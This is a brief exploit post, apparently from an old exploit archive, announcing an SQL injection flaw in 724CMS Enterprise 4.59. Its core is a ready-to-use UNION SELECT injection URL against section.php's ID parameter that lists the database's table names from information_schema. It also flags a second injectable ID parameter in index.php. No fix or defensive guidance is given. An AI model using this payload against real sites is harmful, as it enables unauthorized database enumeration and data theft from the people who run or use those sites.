-------------------------------------------------------------------------------------------

724CMS Enterprise Version 4.59 (section.php) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Name: 724CMS Enterprise Version 4.59

Download: http://724cms.com/

-------------------------------------------------------------------------------------------

Exploit:

http://localhost/[path]/section.php?Nav=Section&ID=-1 union select 0,1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables--

http://localhost/[path]/index.php?auto_slide=&ID=-1 [SQL]

-------------------------------------------------------------------------------------------

Thanks cyberlog ;)

------------------------------------------------------------------------------------------- 